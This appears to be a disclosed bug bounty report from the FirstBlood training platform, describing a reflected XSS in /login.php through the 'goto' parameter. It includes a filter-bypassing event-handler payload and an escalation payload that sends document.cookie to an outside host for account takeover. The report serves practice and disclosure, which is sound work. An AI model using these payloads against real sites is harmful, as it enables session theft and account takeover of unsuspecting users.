FirstBlood-#477 — Reflected XSS on /login.php via goto parameter leads to account takeover
This issue was discovered on FirstBlood v2
On 2021-10-25, 0xblackbird Level 5 reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Hello! I've found out that the exact same issue I reported before is still there and remained unpatched. Below are the steps to reproduce the issue.
Proof of concept url:
-
-
Steps to reproduce:
- As from your methodology, you said that parameters often get reused which is the case here. The goto parameter gets reused and when we view the source code of the following web page https://9a82ae1431a9-0xblackbird.a.firstbloodhackers.com/login.php?goto=xyz, we can see that when we append the goto parameter to the URL, a new hidden input field gets added.
- We can also see that the value of the goto parameter gets reflected and that the most common special characters (such as
", < and >) do not get handled safely. This indicates that we can breakout of the tag easily and inject our own. Visit https://9a82ae1431a9-0xblackbird.a.firstbloodhackers.com/login.php?goto=xyz"x> and view the source code of the web page.
- Knowing that we can inject our own html tags, attributes and event handlers, we can easily craft a little payload that bypasses some of the basic filters:
xyz"><x/autofocus/contenteditable/onfocusin="confirm``">.
Further escalation:
- As mentioned in the title of this report, we can escalate this to account takeover by stealing the user's cookies. To do so, we just have to adjust our payload a bit:
xyz"><x/autofocus/contenteditable/onfocusin="document.location='//0xblackbird.github.io/home?cookies='+document.cookie"> (make sure to url encode the payload to avoid any errors). After getting redirected, we can see our cookies end up in the cookie parameter, this can be accessed by the attacker by reading for example server logs.
Thanks! Have a nice day!
Kind regards,
0xblackbird
P3 Medium
Endpoint: /login.php
Parameter: goto
Payload: xyz"><x/autofocus/contenteditable/onfocusin="confirm``">
FirstBlood ID: 26
Vulnerability Type: Reflective XSS
The developers thought they had fixed ?goto= when reflected in an input tag on login.php from a similar bug (ID 39), but because this endpoint uses legacy code their changes were not applied here and thus the XSS was forgotten.